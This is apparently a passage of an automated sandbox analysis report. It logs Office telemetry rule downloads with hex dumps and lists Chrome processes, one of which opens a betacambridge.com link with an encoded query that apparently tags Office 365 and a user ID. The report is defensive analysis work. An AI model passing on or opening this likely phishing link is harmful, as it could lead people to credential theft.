                                            2024-11-18 20:17:00 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            147192.168.2.44989813.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:17:00 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:17:00 UTC515INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:17:00 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1388
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                            ETag: "0x8DC582BDBD9126E"
                                            x-ms-request-id: 3a2d1fa5-b01e-0098-62ef-39cead000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201700Z-16547b76f7fljddfhC1DFWeqbs000000076g000000003gwm
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            X-Cache-Info: L1_T2
                                            Accept-Ranges: bytes
                                            2024-11-18 20:17:00 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            148192.168.2.44989913.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:17:00 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:17:00 UTC515INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:17:00 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1415
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                            ETag: "0x8DC582BE7C66E85"
                                            x-ms-request-id: 83fa2191-701e-0098-599e-37395f000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201700Z-16547b76f7fqqjnnhC1DFWxv7400000004eg00000001166x
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:17:00 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            149192.168.2.44990013.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:17:00 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:17:00 UTC515INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:17:00 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1378
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                            ETag: "0x8DC582BDB813B3F"
                                            x-ms-request-id: 99e874a7-501e-00a0-6b09-379d9f000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201700Z-16547b76f7fwm7vghC1DFW900s00000003sg00000000yy74
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:17:00 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                            Click to jump to process

                                            Click to jump to process

                                            Click to jump to process

                                            Target ID:0
                                            Start time:15:15:34
                                            Start date:18/11/2024
                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                            Imagebase:0x7ff76e190000
                                            File size:3'242'272 bytes
                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:false

                                            Target ID:1
                                            Start time:15:15:41
                                            Start date:18/11/2024
                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1200 --field-trial-handle=2008,i,4224708502505659071,8326428056869441000,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                            Imagebase:0x7ff76e190000
                                            File size:3'242'272 bytes
                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:false

                                            Target ID:3
                                            Start time:15:15:43
                                            Start date:18/11/2024
                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123N"
                                            Imagebase:0x7ff76e190000
                                            File size:3'242'272 bytes
                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            No disassembly